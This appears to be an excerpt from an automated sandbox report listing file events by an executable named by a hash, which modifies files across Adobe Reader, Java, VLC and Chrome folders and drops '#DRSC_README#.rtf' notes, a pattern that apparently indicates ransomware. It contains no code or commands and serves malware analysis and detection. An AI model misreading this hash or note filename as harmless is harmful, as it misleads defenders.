C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\eu-es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-openide-nodes_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-host-views.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_removeme-default_18.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\themes\dark\adobe_sign_tag.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\pt-br\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\cs-cz\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\hr-hr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_ja_4.4.0.v20140623020002\about.html 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.help.webapp_3.6.300.v20140407-1855.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\he\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\AcroForm\PMP\DataMatrix.pmp 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\nb-no\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\pt-br\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\ro-ro\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\fr-fr\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\com.jrockit.mc.rjmx.metadataprovider.exsd 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\email\themes\dark\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Update\Install\{33958840-4836-4D50-B0D4-7D5C5BA25734}\84.0.4147.89_chrome_installer.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.artifact.repository.nl_ja_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-openide-loaders_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\nb-no\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\fr-fr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\about.html 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\images\Back-48.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Multimedia\MPP\MCIMPP.mpp 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_listview_selected-hover.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\ru-ru\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\nls\pt-br\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\selector.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\fr-fr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ecf.provider.filetransfer_3.2.200.v20140827-1444.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jre1.8.0_66\lib\fonts\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\dropins\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\si\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\@1x\[email protected] 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\themes\dark\dot.cur 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\ja-jp\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\db\bin\dblook.bat 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.nl_ja_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\css\main.css 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\images\themes\dark\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\root\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\db\bin\setEmbeddedCP.bat 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\images\themes\dark\bun.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\zh-cn\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Appstore\Download_on_the_App_Store_Badge_zh_cn_135x40.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\cs-cz\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\en-ae\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\images\example_icons2x.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\eu-es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\da-dk\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\tool\plugin.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.model.workbench.nl_ja_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-netbeans-api-visual.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\pdf-ownership-rdr-ja_jp.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\inline-error-1x.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\es-419_get.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\eu-es\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\include\jni.h 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.forms.nl_zh_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\intf\dummy.luac 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\plugins\rhp\editpdf-selector.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\include\win32\jni_md.h 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\mix.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\tr-tr\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\root\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\currency.data 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.core.di_1.4.0.v20140414-1837.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\pl-pl\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\zh-tw\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\ca-es\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\tr-tr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\images\themes\dark\rhp_world_icon_hover_2x.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\MobileAcrobatCard_Dark.pdf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\META-INF\MANIFEST.MF 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\Home.aapp 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\hr-hr\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\VisualElements\SmallLogo.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themeless\organize_poster.jpg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\ks_IN\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\remove.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\icons_retina.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\hr-hr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\ro-ro\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\lib\boot.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\forms_received.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\themes\dark\core_icons.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\pt-br\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\en-il\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\high-contrast.css 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\my\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\adobe_sign_tag_retina.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\include\win32\bridge\AccessBridgeCalls.h 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\security\java.security 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\js\common.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\css\main.css 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\sl-si\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\SplitUnprotect.avi 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\back-arrow-hover.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\plugins\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\it_get.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\dark\e4-dark_partstyle.css 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\dialogs\stream_window.html 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\selector.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-openide-loaders.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.reconciler.dropins.nl_ja_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.jface_3.10.1.v20140813-1009.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\deploy\messages_ja.properties 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\javaws.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\it-it\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\ko-kr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\en-gb\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.core.di.extensions_0.12.0.v20140417-2033.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\ext\sunmscapi.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\intf\http.luac 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\ro-ro\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\da-dk\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\js\nls\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\epl-v10.html 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\db\bin\setNetworkClientCP 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_checkbox_selected_18.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_listview.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\ro-ro\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\es-es\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\CompareOut.ps1 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.browser.jdp.ja_5.5.0.165303.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\bn_IN\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\turnOnNotificationInTray.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\de-de\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\db\lib\derbyLocale_ko_KR.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\mobile.html 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\ja-jp\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\nb-no\AppStore_icon.svg 